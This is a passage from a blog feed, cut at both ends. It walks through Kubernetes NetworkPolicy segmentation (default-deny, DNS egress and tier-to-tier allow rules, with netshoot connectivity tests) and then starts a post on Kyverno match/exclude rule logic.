      <span class="hljs-attr">targetPort:</span> <span class="hljs-number">80</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">apps/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Deployment</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">postgres</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">db</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">app:</span> <span class="hljs-string">postgres</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">replicas:</span> <span class="hljs-number">1</span>
  <span class="hljs-attr">selector:</span>
    <span class="hljs-attr">matchLabels:</span>
      <span class="hljs-attr">app:</span> <span class="hljs-string">postgres</span>
  <span class="hljs-attr">template:</span>
    <span class="hljs-attr">metadata:</span>
      <span class="hljs-attr">labels:</span>
        <span class="hljs-attr">app:</span> <span class="hljs-string">postgres</span>
    <span class="hljs-attr">spec:</span>
      <span class="hljs-attr">containers:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">postgres</span>
          <span class="hljs-attr">image:</span> <span class="hljs-string">postgres:15-alpine</span>
          <span class="hljs-attr">env:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">POSTGRES_PASSWORD</span>
              <span class="hljs-attr">value:</span> <span class="hljs-string">pass</span>
          <span class="hljs-attr">ports:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">containerPort:</span> <span class="hljs-number">5432</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Service</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">postgres</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">db</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">selector:</span>
    <span class="hljs-attr">app:</span> <span class="hljs-string">postgres</span>
  <span class="hljs-attr">ports:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">pg</span>
      <span class="hljs-attr">port:</span> <span class="hljs-number">5432</span>
      <span class="hljs-attr">targetPort:</span> <span class="hljs-number">5432</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
</code></pre>
<blockquote>
<p>After a minute or two, you should have:  </p>
<ul>
<li><code>web.frontend.svc.cluster.local</code> (HTTP 80)  </li>
<li><code>api.backend.svc.cluster.local</code> (HTTP 80)  </li>
<li><code>postgres.db.svc.cluster.local</code> (TCP 5432)</li>
</ul>
</blockquote>
<h3 id="heading-test-pods-netshoot-for-quick-verification">Test pods (netshoot) for quick verification</h3>
<blockquote>
<p>netshoot is <a target="_blank" href="https://hub.docker.com/r/nicolaka/netshoot">a Docker Networking Trouble-shooting Swiss-Army Container</a>, so useful for this exercise</p>
</blockquote>
<p>Let's see what the default behavior is. We want to make sure everything is connected. We'll run a temporary shell in each namespace and test commands in each namespace:</p>
<h4 id="heading-from-frontend-shell">From frontend shell:</h4>
<pre><code class="lang-bash">matt@controlplane:~/np$ kubectl run -n frontend <span class="hljs-built_in">test</span> --image=nicolaka/netshoot -it --rm -- bash
If you don<span class="hljs-string">'t see a command prompt, try pressing enter.
test:~# curl -sS http://api.backend.svc.cluster.local:80
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
&lt;title&gt;Welcome to nginx!&lt;/title&gt;
&lt;style&gt;
html { color-scheme: light dark; }
body { width: 35em; margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif; }
&lt;/style&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;h1&gt;Welcome to nginx!&lt;/h1&gt;
&lt;p&gt;If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.&lt;/p&gt;

&lt;p&gt;For online documentation and support please refer to
&lt;a href="http://nginx.org/"&gt;nginx.org&lt;/a&gt;.&lt;br/&gt;
Commercial support is available at
&lt;a href="http://nginx.com/"&gt;nginx.com&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Thank you for using nginx.&lt;/em&gt;&lt;/p&gt;
&lt;/body&gt;
&lt;/html&gt;
test:~#</span>
</code></pre>
<h4 id="heading-from-backend-shell">From backend shell:</h4>
<pre><code class="lang-bash">matt@controlplane:~/np$ kubectl run -n backend <span class="hljs-built_in">test</span> --image=nicolaka/netshoot -it --rm -- bash
If you don<span class="hljs-string">'t see a command prompt, try pressing enter.
test:~# nc -vz postgres.db.svc.cluster.local 5432
Connection to postgres.db.svc.cluster.local (10.110.205.214) 5432 port [tcp/postgresql] succeeded!
test:~#</span>
</code></pre>
<h4 id="heading-from-anywhere">From anywhere:</h4>
<pre><code class="lang-bash"><span class="hljs-built_in">test</span>:~<span class="hljs-comment"># dig +short google.com #google ip</span>
142.251.46.206
<span class="hljs-built_in">test</span>:~<span class="hljs-comment">#</span>
</code></pre>
<p>Cool. With <strong>no</strong> NetworkPolicies, these will all work. Of course, the goal is to not have <strong>everything</strong> work. Let's get that process going.</p>
<hr />
<h2 id="heading-default-deny-everything">Default-Deny Everything</h2>
<p>The first rule of any security posture: deny, deny, deny. Ok maybe those are three rules, but you get the point.</p>
<p>The first rule of network policy: flip the cluster from “allow all” to “deny by default.”  </p>
<p>We've established the Kubernetes default configuration allows every pod to talk to every other pod. To change that, we apply a very basic network policy with an empty <code>podSelector</code> (which matches <em>all</em> pods in the namespace) and no rules. That blocks all ingress and egress.</p>
<p>Here’s a default-deny you can drop into each namespace. Just save in a single file called <code>deny-policy.yaml</code>.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">networking.k8s.io/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">NetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">default-deny</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">frontend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">podSelector:</span> {}
  <span class="hljs-attr">policyTypes:</span> [<span class="hljs-string">"Ingress"</span>, <span class="hljs-string">"Egress"</span>]
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">networking.k8s.io/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">NetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">default-deny</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">backend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">podSelector:</span> {}
  <span class="hljs-attr">policyTypes:</span> [<span class="hljs-string">"Ingress"</span>, <span class="hljs-string">"Egress"</span>]
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">networking.k8s.io/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">NetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">default-deny</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">db</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">podSelector:</span> {}
  <span class="hljs-attr">policyTypes:</span> [<span class="hljs-string">"Ingress"</span>, <span class="hljs-string">"Egress"</span>]
</code></pre>
<h3 id="heading-walkthrough">Walkthrough</h3>
<ul>
<li>Apply file via <code>kubectl apply -f deny-policy.yaml</code> to create the relevant network policies.</li>
<li>Every pod in those namespaces will now be isolated, no incoming or outgoing connections.  </li>
<li>DNS lookups will also break, since egress is blocked by default. </li>
</ul>
<h3 id="heading-quick-test">Quick Test</h3>
<p>Spin up a <code>netshoot</code> pod in the <code>frontend</code> namespace and try some basics:</p>
<pre><code class="lang-bash">kubectl run -n frontend <span class="hljs-built_in">test</span> --image=nicolaka/netshoot -it --rm -- bash

<span class="hljs-comment"># Inside the pod:</span>
curl http://api.backend.svc.cluster.local:80  
dig google.com
</code></pre>
<p>Both of these should now fail. Sadly, we've gone from no segmentation to deny everything. Not exactly helpful. But from here, we’ll add back the <em>minimum</em> connections the app needs to function. </p>
<p>One thing we’re not doing here is deleting the default-deny policy. That remains our baseline. Every new rule we add (like our soon to come DNS carve-out) is layered <em>on top of</em> the default deny. Think of it as our safety blanket.</p>
<hr />
<h2 id="heading-allow-dns-egress">Allow DNS Egress</h2>
<p>Once we flipped everything to default-deny, out first casualty was <strong>DNS lookups stopped working.</strong> That’s expected, since every pod in <code>frontend</code>, <code>backend</code>, and <code>db</code> is now cut off from making <em>any</em> outbound connection, including the very boring-but-essential queries to the cluster DNS service. Even a simple <code>dig google.com</code> from your netshoot pods fails.</p>
<p><strong>Why DNS matters to the app:</strong>  </p>
<ul>
<li><strong>Service discovery.</strong> Pods usually talk to each other by service names (<code>api.backend.svc.cluster.local</code>), not IPs. Without DNS, those names don’t resolve and your “frontend → backend” call breaks.  </li>
<li><strong>External calls.</strong> If a pod talks to anything outside the cluster (API, S3, etc.), it resolves by name first. No DNS = instant failure.  </li>
<li><strong>Certs &amp; health checks.</strong> TLS handshakes and readiness probes often rely on hostnames. Break DNS and you’ll see flaky startups or cert errors.  </li>
</ul>
<p>So we explicitly allow egress <strong>only to the cluster DNS service</strong> (CoreDNS/kube-dns in <code>kube-system</code>) on <strong>UDP/TCP 53</strong>. This does <strong>not</strong> open general internet egress; it simply lets pods ask, “what IP is <code>api.backend.svc.cluster.local</code>?” and go back to being productive.</p>
<p>Here’s a allow dns you can drop into each namespace. Just save in a single file called <code>dns-networkpolicy.yaml</code>.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">networking.k8s.io/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">NetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">allow-dns-egress</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">frontend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">podSelector:</span> {}
  <span class="hljs-attr">policyTypes:</span> [<span class="hljs-string">"Egress"</span>]
  <span class="hljs-attr">egress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">to:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">namespaceSelector:</span>
            <span class="hljs-attr">matchLabels:</span>
              <span class="hljs-attr">kubernetes.io/metadata.name:</span> <span class="hljs-string">kube-system</span>
          <span class="hljs-attr">podSelector:</span>
            <span class="hljs-attr">matchLabels:</span>
              <span class="hljs-attr">k8s-app:</span> <span class="hljs-string">kube-dns</span>
      <span class="hljs-attr">ports:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">protocol:</span> <span class="hljs-string">UDP</span>
          <span class="hljs-attr">port:</span> <span class="hljs-number">53</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
          <span class="hljs-attr">port:</span> <span class="hljs-number">53</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">networking.k8s.io/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">NetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">allow-dns-egress</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">backend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">podSelector:</span> {}
  <span class="hljs-attr">policyTypes:</span> [<span class="hljs-string">"Egress"</span>]
  <span class="hljs-attr">egress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">to:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">namespaceSelector:</span>
            <span class="hljs-attr">matchLabels:</span>
              <span class="hljs-attr">kubernetes.io/metadata.name:</span> <span class="hljs-string">kube-system</span>
          <span class="hljs-attr">podSelector:</span>
            <span class="hljs-attr">matchLabels:</span>
              <span class="hljs-attr">k8s-app:</span> <span class="hljs-string">kube-dns</span>
      <span class="hljs-attr">ports:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">protocol:</span> <span class="hljs-string">UDP</span>
          <span class="hljs-attr">port:</span> <span class="hljs-number">53</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
          <span class="hljs-attr">port:</span> <span class="hljs-number">53</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">networking.k8s.io/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">NetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">allow-dns-egress</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">db</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">podSelector:</span> {}
  <span class="hljs-attr">policyTypes:</span> [<span class="hljs-string">"Egress"</span>]
  <span class="hljs-attr">egress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">to:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">namespaceSelector:</span>
            <span class="hljs-attr">matchLabels:</span>
              <span class="hljs-attr">kubernetes.io/metadata.name:</span> <span class="hljs-string">kube-system</span>
          <span class="hljs-attr">podSelector:</span>
            <span class="hljs-attr">matchLabels:</span>
              <span class="hljs-attr">k8s-app:</span> <span class="hljs-string">kube-dns</span>
      <span class="hljs-attr">ports:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">protocol:</span> <span class="hljs-string">UDP</span>
          <span class="hljs-attr">port:</span> <span class="hljs-number">53</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
          <span class="hljs-attr">port:</span> <span class="hljs-number">53</span>
</code></pre>
<p>I am not 100% sure <code>k8s-app=kube-dns</code> always works. But this works on my kubeadm cluster with Calico CNI.</p>
<h3 id="heading-walkthrough-1">Walkthrough</h3>
<ul>
<li>Apply file via <code>kubectl apply -f dns-networkpolicy.yaml</code> to create the relevant network policies.</li>
<li>This doesn’t allow full internet egress, just DNS queries to <code>kube-dns</code>.  </li>
<li>Now you can run <code>dig google.com</code> from your netshoot pods and get a valid response again.</li>
</ul>
<h3 id="heading-quick-test-1">Quick Test</h3>
<pre><code class="lang-bash">matt@controlplane:~/np$ kubectl run -n frontend <span class="hljs-built_in">test</span> --image=nicolaka/netshoot -it --rm -- bash
If you don<span class="hljs-string">'t see a command prompt, try pressing enter.
test:~# dig +short google.com
142.250.176.14
test:~#</span>
</code></pre>
<p>Cool, works as we want. With DNS restored, your apps can resolve service names and external domains, but all other connections are still blocked. Next we’ll add back the actual service-to-service flows that make the three-tier app work.</p>
<hr />
<h2 id="heading-allow-service-to-service-flows">Allow Service-to-Service Flows</h2>
<p>With DNS back in place, pods can at least resolve names again, but traffic is still at a stop. That’s exactly what we want: default-deny baseline plus a single DNS carve-out. Now it’s time to add back the flows that actually make our three-tier app work.</p>
<h3 id="heading-frontend-backend">Frontend → Backend</h3>
<p>Our frontend pods need to call the backend API on <strong>TCP 80</strong>. That means we have to allow two directions:  </p>
<ul>
<li><strong>Egress</strong> from the frontend pods to the <code>backend</code> namespace on port 80.  </li>
<li><strong>Ingress</strong> into the backend pods, but only from the <code>frontend</code> namespace and only on that port.  </li>
</ul>
<p>Here’s an allow frontend to backend you can drop into each namespace. Just save in a single file called <code>front-to-back-networkpolicy.yaml</code>.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">networking.k8s.io/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">NetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">allow-egress-to-backend</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">frontend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">podSelector:</span> {}  <span class="hljs-comment"># or matchLabels: {app: web} if you want to scope to just the web pods</span>
  <span class="hljs-attr">policyTypes:</span> [<span class="hljs-string">"Egress"</span>]
  <span class="hljs-attr">egress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">to:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">namespaceSelector:</span>
            <span class="hljs-attr">matchLabels:</span>
              <span class="hljs-attr">tier:</span> <span class="hljs-string">backend</span>
          <span class="hljs-attr">podSelector:</span>
            <span class="hljs-attr">matchLabels:</span>
              <span class="hljs-attr">app:</span> <span class="hljs-string">api</span>
      <span class="hljs-attr">ports:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
          <span class="hljs-attr">port:</span> <span class="hljs-number">80</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">networking.k8s.io/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">NetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">allow-frontend-to-backend</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">backend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">podSelector:</span>
    <span class="hljs-attr">matchLabels:</span>
      <span class="hljs-attr">app:</span> <span class="hljs-string">api</span>
  <span class="hljs-attr">ingress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">from:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">namespaceSelector:</span>
            <span class="hljs-attr">matchLabels:</span>
              <span class="hljs-attr">tier:</span> <span class="hljs-string">frontend</span>
      <span class="hljs-attr">ports:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
          <span class="hljs-attr">port:</span> <span class="hljs-number">80</span>
</code></pre>
<h3 id="heading-backend-database">Backend → Database</h3>
<p>Next, backend pods need to talk to Postgres on <strong>TCP 5432</strong>. Just like with frontend → backend, that means two pieces:  </p>
<ul>
<li><strong>Egress</strong> from the backend pods to the <code>db</code> namespace on port 5432.  </li>
<li><strong>Ingress</strong> into the db pods, but only from the <code>backend</code> namespace and only on that port.  </li>
</ul>
<p>Here’s a allow backend to db you can drop into each namespace. Just save in a single file called <code>back-to-db-networkpolicy.yaml</code>.</p>
<pre><code class="lang-yaml"><span class="hljs-comment"># Egress from backend → db</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">networking.k8s.io/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">NetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">allow-backend-egress-to-db</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">backend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">podSelector:</span> {}
  <span class="hljs-attr">policyTypes:</span> [<span class="hljs-string">"Egress"</span>]
  <span class="hljs-attr">egress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">to:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">namespaceSelector:</span>
            <span class="hljs-attr">matchLabels:</span>
              <span class="hljs-attr">tier:</span> <span class="hljs-string">db</span>
          <span class="hljs-attr">podSelector:</span>
            <span class="hljs-attr">matchLabels:</span>
              <span class="hljs-attr">app:</span> <span class="hljs-string">postgres</span>
      <span class="hljs-attr">ports:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
          <span class="hljs-attr">port:</span> <span class="hljs-number">5432</span>
<span class="hljs-meta">---</span>
<span class="hljs-comment"># Ingress into db from backend</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">networking.k8s.io/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">NetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">allow-backend-to-db</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">db</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">podSelector:</span>
    <span class="hljs-attr">matchLabels:</span>
      <span class="hljs-attr">app:</span> <span class="hljs-string">postgres</span>
  <span class="hljs-attr">ingress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">from:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">namespaceSelector:</span>
            <span class="hljs-attr">matchLabels:</span>
              <span class="hljs-attr">tier:</span> <span class="hljs-string">backend</span>
      <span class="hljs-attr">ports:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
          <span class="hljs-attr">port:</span> <span class="hljs-number">5432</span>
</code></pre>
<h3 id="heading-walkthrough-2">Walkthrough</h3>
<ul>
<li>Apply these policies on top of the default-deny and DNS rules.  </li>
<li>Frontend → Backend on port 80 should now succeed.  </li>
<li>Backend → DB on port 5432 should now succeed.  </li>
<li>Any other cross-namespace attempt (like frontend → db or db → backend) still fails.  </li>
</ul>
<h3 id="heading-quick-test-2">Quick Test</h3>
<h4 id="heading-from-frontend-shell-1">From frontend shell:</h4>
<pre><code class="lang-bash">matt@controlplane:~/np$ kubectl run -n frontend <span class="hljs-built_in">test</span> --image=nicolaka/netshoot -it --rm -- bash
If you don<span class="hljs-string">'t see a command prompt, try pressing enter.
test:~# curl -sS http://api.backend.svc.cluster.local:80
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
&lt;title&gt;Welcome to nginx!&lt;/title&gt;
&lt;style&gt;
html { color-scheme: light dark; }
body { width: 35em; margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif; }
&lt;/style&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;h1&gt;Welcome to nginx!&lt;/h1&gt;
&lt;p&gt;If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.&lt;/p&gt;

&lt;p&gt;For online documentation and support please refer to
&lt;a href="http://nginx.org/"&gt;nginx.org&lt;/a&gt;.&lt;br/&gt;
Commercial support is available at
&lt;a href="http://nginx.com/"&gt;nginx.com&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Thank you for using nginx.&lt;/em&gt;&lt;/p&gt;
&lt;/body&gt;
&lt;/html&gt;
test:~#</span>
</code></pre>
<h4 id="heading-from-backend-shell-1">From backend shell:</h4>
<pre><code class="lang-bash">matt@controlplane:~/np$ kubectl run -n backend <span class="hljs-built_in">test</span> --image=nicolaka/netshoot -it --rm -- bash
If you don<span class="hljs-string">'t see a command prompt, try pressing enter.
test:~# nc -vz postgres.db.svc.cluster.local 5432
Connection to postgres.db.svc.cluster.local (10.110.205.214) 5432 port [tcp/postgresql] succeeded!
test:~#</span>
</code></pre>
<p>At this point we’ve re-enabled just enough traffic for the app to function: frontend → backend → db, plus DNS everywhere. Everything else remains blocked. That’s <strong>baseline L3/L4 segmentation</strong> in action.</p>
<p>Now if you doubted me on the DNS thing, just delete that policy and try front to backend. Good luck.</p>
<hr />
<h2 id="heading-what-we-just-built">What We Just Built</h2>
<p>Now let's step back for a second. We started with a cluster that was flat and wide open: every pod could talk to every other pod, in every namespace, on every port. That’s the default state of Kubernetes networking, convenient but quite insecure.</p>
<p>Now look at where we are:</p>
<ul>
<li><strong>Default-deny baseline</strong>: nothing moves unless we say so.  </li>
<li><strong>DNS carve-out</strong>: pods can still resolve service names and external hosts, but nothing else is open-ended.  </li>
<li><strong>Frontend → Backend on :80</strong>: the app’s public entry point can reach the API tier, and that’s it.  </li>
<li><strong>Backend → DB on :5432</strong>: the API tier can query the database, but it’s walled off from everything else.  </li>
<li><strong>Everything else blocked</strong>: no random cross-namespace chatter, no sneaky egress to the internet.  </li>
</ul>
<p>What we’ve really built here is a <strong>3-hop app chain</strong>: frontend → backend → database, with DNS as the plumbing. Instead of a spaghetti mess of possible connections, the graph collapses down to just the flows the app is supposed to have. </p>
<p>This is <strong>least privilege at L3/L4</strong>. And it is dead simple, no service mesh required. Just a handful of manifests that take Kubernetes from “anyone can talk to anyone” to “only these three things can talk, on these two ports.” Not bad.</p>
<hr />
<h2 id="heading-lateral-movement-blocked">Lateral Movement, Blocked</h2>
<p>So we get a nice win. Without policies, landing in the frontend provides the run of the cluster. Curl into the backend, hop into the database, and keep poking at other namespaces until something breaks. That's on us, not Kubernetes.</p>
<p>With our policies in place, the world just got a lot smaller:  </p>
<ul>
<li>In <strong>frontend</strong>, you can only send traffic to backend’s API service on port 80. No database, no random namespaces, no internet egress.  </li>
<li>In <strong>backend</strong>, you can only reach Postgres on port 5432. No shortcut to frontend, no talking to other services.  </li>
<li>The <strong>db</strong> tier is a walled garden. It only listens to backend, and that’s it.  </li>
</ul>
<p>Every other path is cut off. We’ve shrunk the surface area from “everything-to-everything” down to a single three-hop chain. Peace out, lateral movement.</p>
<hr />
<h2 id="heading-whats-next-scaling-with-calico">What’s Next (Scaling with Calico)</h2>
<p>That’s the baseline: Kubernetes <code>NetworkPolicy</code> gave us simple, effective service boundaries at the L3/L4 level. It works. But what happens when you’re running dozens of namespaces? How do you enforce organization-wide defaults without copy-pasting YAML everywhere? <a target="_blank" href="https://cloudsecburrito.com/control-issues-tales-of-kubernetes-admission">Admission controller</a> sure (oh yeah I wrote about that), but we shouldn't need it for everything Kubernetes. </p>
<p>That’s where <strong>Calico</strong> comes in. In Part 2, we’ll take this same model and scale it with Calico’s <strong>GlobalNetworkPolicies</strong>, <strong>NetworkSets</strong>, and built-in flow logs. It’s the same idea of least privilege, but with tools designed to handle more than a three-tier demo app.</p>
<p>Stay tuned loyal reader.</p>
]]></content:encoded></item><item><title><![CDATA[Control Issues: From Policy to Practice]]></title><description><![CDATA[You can get a lot done in Kubernetes just by blocking bad stuff at admission time. That’s where we left things in Part 2. We installed Kyverno, wrote policies, and saw workloads getting stopped before they cause trouble. We also saw things like mutat...]]></description><link>https://cloudsecburrito.com/control-issues-from-policy-to-practice</link><guid isPermaLink="true">https://cloudsecburrito.com/control-issues-from-policy-to-practice</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[kyverno]]></category><category><![CDATA[admission controller]]></category><category><![CDATA[Security]]></category><category><![CDATA[YAML]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Wed, 20 Aug 2025 01:32:50 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1755647010216/236845bd-9dcd-442a-8560-42d1ad4e4fcd.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>You can get a lot done in Kubernetes just by blocking bad stuff at admission time. That’s where we left things in Part 2. We installed Kyverno, wrote policies, and saw workloads getting stopped before they cause trouble. We also saw things like mutations and generating resources on the fly. It was all fairly straightforward.</p>
<p>But how can we take Kyverno to the next level without just writing a couple of ClusterPolicy YAMLs and calling it a day? Policies don’t live in a vacuum. They need testing, exceptions, tuning, and visibility into what’s actually happening in your cluster. And the cool thing is, all of that is built into Kyverno or available in one of its side projects.</p>
<p>In Part 3 of this series, we’re moving past “first policy” territory and into operations. We’ll cover:</p>
<ul>
<li>Matching what gets blocked  </li>
<li>Testing policies before they hit the cluster with <code>kyverno test</code>  </li>
<li>Making exceptions without throwing away your guardrails  </li>
<li>Borrowing from the upstream policy library for quick wins like <code>securityContext</code> hardening and volume restrictions  </li>
<li>Observing policy activity with Prometheus metrics and Policy Reporter dashboards  </li>
</ul>
<p>The goal here isn’t to write more YAML. It’s to build a feedback loop where your policies get better, your exceptions are targeted, and you can actually prove the impact of your enforcement. As usual, let's get to it.</p>
<hr />
<h2 id="heading-match-exclude-and-the-patterns-that-follow">Match, Exclude, and the Patterns That Follow</h2>
<p>Before we pile on tests, exceptions, and dashboards, let’s be crystal clear on <strong>how a rule decides it applies</strong> and what happens next. Most “why did this block?” mysteries boil down to match logic or pattern evaluation, simple as that..  </p>
<h3 id="heading-rule-evaluation-order">Rule Evaluation Order</h3>
<p>For each incoming request, Kyverno runs through this sequence:  </p>
<ol>
<li><strong>Match</strong> – does the resource match <code>match.resources</code>? If not, skip.  </li>
<li><strong>Exclude</strong> – does it also match <code>exclude.resources</code>? If yes, skip.  </li>
<li><strong>Preconditions</strong> – optional extra checks (e.g. JMESPath). If false, skip.  </li>
<li><strong>Action</strong> – run the rule (<code>validate</code>, <code>mutate</code>, <code>generate</code>, or <code>verify</code>).  </li>
</ol>
<blockquote>
<p>Note: mutations always happen before validations.  </p>
</blockquote>
<p>If you’re confused about <code>match</code> vs <code>exclude</code>, you’re not alone. The docs aren’t explicit about ordering, but the <a target="_blank" href="https://github.com/kyverno/kyverno/blob/main/pkg/engine/utils/match.go">source</a> makes it clear: <strong>match first, exclude second</strong>. Of course that makes sense as optimal, but still.</p>
<h3 id="heading-and-vs-or-logic">AND vs OR Logic</h3>
<ul>
<li>Inside a single <code>resources</code> block, fields are <strong>ANDed</strong>. All must match.  </li>
<li>Use <code>any:</code> to OR multiple <code>resources</code> blocks.  </li>
</ul>
<pre><code class="lang-yaml"><span class="hljs-comment"># Pods in prod namespace AND labeled app=backend</span>
<span class="hljs-attr">match:</span>
  <span class="hljs-attr">resources:</span>
    <span class="hljs-attr">kinds:</span> [<span class="hljs-string">"Pod"</span>]
    <span class="hljs-attr">namespaces:</span> [<span class="hljs-string">"prod"</span>]
    <span class="hljs-attr">selector:</span>
      <span class="hljs-attr">matchLabels:</span>
        <span class="hljs-attr">app:</span> <span class="hljs-string">backend</span>
</code></pre>
<pre><code class="lang-yaml"><span class="hljs-comment"># Pods in prod namespace OR labeled app=backend</span>
<span class="hljs-attr">match:</span>
